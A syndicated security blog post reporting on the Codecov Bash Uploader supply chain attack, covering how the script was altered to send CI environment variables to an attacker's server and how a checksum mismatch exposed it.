What You Need to Know about the Codecov Incident: A Supply Chain Attack Gone Undetected for 2 Months - Security Boulevard

What You Need to Know about the Codecov Incident: A Supply Chain Attack Gone Undetected for 2 Months

Last week, software testing firm Codecov disclosed a noteworthy security incident that gained the attention of the U.S. federal government investigators.

Codecov has over 29,000 enterprise customers, including reputed names like Atlassian, Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

On April 1st, Codecov became aware that threat actors had gained unauthorized access to their Bash Uploader script and altered it without raising any obvious red flags.

The issue occurred due to an error in Codecov’s Docker image creation process that enabled the actors to extract sensitive credentials and modify the Bash Uploader script.

Consequently, this allowed the actors to potentially exfiltrate sensitive information from Codecov customers’ continuous integration (CI) environments, such as environment variables containing keys, credentials, and tokens, outside of Codecov’s infrastructure.  

The system breach remained undetected for over two months, which is when a Codecov customer alerted the company of a discrepancy between the shashum (hash or “file fingerprint”) of the Bash Uploader script present on the website and the (correct) shasum listed on Codecov’s GitHub.

Essentially, the attackers had replaced the IP address of Codecov’s servers with their own in the Bash Uploader script:

attackers had replaced the IP address of Codecov’s servers with their own in the Bash Uploader script

This meant data such as a Codecov user’s system environment variables, meant to be used for legitimate operations, instead got uploaded to the attacker’s IP address, shown here.

Environment variables can contain a plethora of information about a system. From simple information such as the PATH variable, current username, and working directory, to sensitive API keys, tokens, and credentials/passwords used by applications.

Example Apple environment variable configuration file with key information redacted in gray

Image: Example Apple environment variable configuration file with key information redacted in gray

Another Major Supply Chain Attack That Targeted Developers

In what is now being compared to the SolarWinds supply-chain attack, Codecov incident is yet another testament to developers and development tools being (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/what-you-need-to-know-about-the-codecov-incident-a-supply-chain-attack-gone-undetected-for-2-months